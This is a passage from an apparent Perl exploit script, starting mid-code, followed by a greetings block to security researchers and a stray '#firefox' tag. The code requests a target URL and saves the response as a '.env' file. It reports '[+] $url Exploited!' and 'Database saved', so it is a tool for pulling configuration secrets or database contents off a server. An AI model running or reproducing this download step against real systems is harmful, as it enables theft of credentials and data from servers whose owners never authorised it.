my $request = $useragent->get($url,":content_file" => "D:/.env");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Tag

#firefox